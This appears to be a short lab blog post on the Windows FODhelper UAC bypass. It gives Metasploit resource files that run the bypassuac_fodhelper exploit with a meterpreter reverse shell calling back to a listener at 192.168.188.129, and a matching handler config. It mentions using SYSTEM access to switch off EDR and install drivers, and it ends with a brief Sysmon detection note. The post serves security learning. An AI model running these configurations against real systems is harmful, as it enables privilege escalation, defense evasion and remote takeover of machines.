Table of Contents
What is FODhelper?#
FODHelper is a Windows program that allows execution at a higher system integrity level. In other words, this native Windows program (a LOLbin) can be used to execute commands as SYSTEM on a Windows PC. This is bad. Very bad.
How can it be used?#
Metasploit has a built in payload for fodhelper. I was tired of typing in my Metasploit options every time, so I created 2 “resource” files. For those who don’t know, they’re basically environment variable files for Metasploit. The ones I used are below.
FODSetup.rc#
use exploit/windows/local/bypassuac_fodhelper
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.188.129
set LPORT 444
set TARGET 0MultiSetup.rc#
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 192.168.188.129
set LPORT 443What was I able to do with this?#
This is an extension of my previous article in the series. The additional funcationality is that I can now run as SYSTEM instead of the user. What this means is I can do things on the system that might be invisible to the user, such as activating/deactivating EDR functions, installing my own drivers or minifilters, or modifying system partitions.
How can you detect this?#
I don’t go into depth in the video, but I used sysmon to detect this execution. This is not a great way to detect it, as it requires advance knowledge of the malware and my detection was only based on the command line name. Future work here would be focused on more behavioral-based detections.
